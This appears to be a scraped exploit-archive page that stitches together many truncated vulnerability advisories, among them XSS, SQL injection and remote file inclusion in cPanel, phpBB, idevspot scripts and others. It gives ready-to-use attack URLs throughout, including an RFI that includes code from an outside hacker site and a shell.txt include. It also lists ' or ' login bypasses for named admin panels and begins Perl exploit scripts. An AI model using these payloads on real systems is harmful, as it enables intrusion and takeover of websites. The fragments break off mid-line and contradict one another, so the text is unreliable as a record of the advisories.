---
about the vendor:
Drupal is an open source content management platform powering millions of
websites and applications. ItÂ’s built, used, and supported by an active and
diverse community of people around the world.
Advisory Details:
During a Pentest Help AG auditors(Ali & Khal
Cross-Site Scripting (XSS) in Q-Pulse application
Advisory ID: hag201475
Product: q-pulse risk management software
Vendor: q-pulse
Vulnerable Version(s): 0.6 and probably prior
Tested Version: 0.6
Advisory Publication: Januray 14, 2013
Vendor Notification: July 31, 2013
Public Disclosure: Decem
# Exploit Title: Multiple SQL injections in rivettracker <=1.03
# Date: 2/3/2012
# Author: Ali Raheem
# Software Link: http://www.rivetcode.com/software/rivettracker/
# Version: <=1.03
# Tested on: Linux guruplug-debian 3.1.7 #2 PREEMPT Tue Jan 3 20:19:54
MST 2012 armv5tel GNU/Linux
#
vendor : cpanel
version : all...
by : s3rv3r_hack3r
my-web-sitez : www.hackerz.ir - ali.hackerz.ir
exploit:
http://dpmaon.com:2086/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?
###
@cid stats v2.3 File Include
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1115
###
Vulnerable Code:_
install.php3
#
###
phpLedAds 2.0(dir) File Include
###
Source Code:
ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip
###
Vulnerable Code:_
click.php & ledad.php & le
###
PLS-Bannieres 1.21 (bannieres.php) File Include
###
Source Code:
ftp://ftp1.comscripts.com/PHP/1959_ban01-01.zip
###
Vulnerable Code:_
modules/bann
###
Ban v0.1 (bannieres.php) File Include
###
Source Code:
ftp://ftp1.comscripts.com/PHP/1959_ban01-01.zip
###
Vulnerable Code:_
modules/bannieres/bann
###
PHP Poll Creator 1.04 (poll_vote.php)File Include
###
Source Code:
http://www.phppc.de/download/phppc_104.zip
###
Vulnerable Code:_
include $relat
###
DigitalHive 2.0 RC2 (base_include.php)File Include
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1502
###
Vulnerable Code:_
include ($_GET["page"]);
###
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=666
###
Vulnerable Code:_
include($phpbb_
###
CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=643
###
Vulnerable Code:_
include("$inclu
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
re
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
EXlor 1.0 (/fonctions/template.php) Remote File Include Vulnerability
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1904
-=-=--
NixieAffiliate all version
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
Bypass for delete any aff ID :>>
www.domain.com/NixieAffiliate/delete.php?id=1
Xss :>>
www.domain.com/NixieAffiliate/forms/lostpassword.php?error=[xss]
BizDirectory All version == RFI
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
www.domain.com/BizDirectory/Feed.php?stylesheet=[xss]
www.domain.com/BizDirectory/status.php?message=[xss]
vendor : easypage.org
BY : s3rv3r_hack3r
www : hackerz.ir & h4ckerz.com
bug : >
default.aspx?page=Search&app=Search&srch=[sql]
and more ...
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
remote file include :
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]
xss:
http://www.domain.com/PhpLinkExchange/user_add.php?
vendor : www.idevspot.com
version : all version
By : s3rv3r_hack3r
www : hackerz.ir & h4ckerz.com
http://localhost/textads/clients/delete.php?id=[xss]
http://victim/textads/clients/error.php?error[xss]
and more...
script name : php download
vendor : www.threesquared.net
By : s3rv3r_hack3r
u can include local file
>>
www.victim.com/download/index.php?file=[file path]
+
JS ASP Faq Manager v1.10
vendor : http://jetstat.com/
Demo : http://jetstat.com/demo/jsfaq/admin/
By : s3rv3r_hack3r
Site : www.hackerz.ir & www.h4kerz.com
U can login to administrator control panel with >>
user : admin
pass : ' or '
u can login to your account without username !
example :
your user name : hackerz
your password : 123456
u can login with only - pass : 123456
++
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..
##
# ___ _____ #
# / | \_ | | __ ___ #
#/~\__ \ _/
Vendor : SiteMan
Target Page : admin_login.asp
Bug Finder : S3rv3r_hack3r
administrator panel (demo): http://www.ispdemos.com/Demo/SiteMan/admin_login.asp
WWW : http://www.ispofegypt.com/
you can login to admin_login.asp with >>
user : admin
pass : ' or '
Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description (linksubmit.php)
Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
###
26 matches
Mail list logo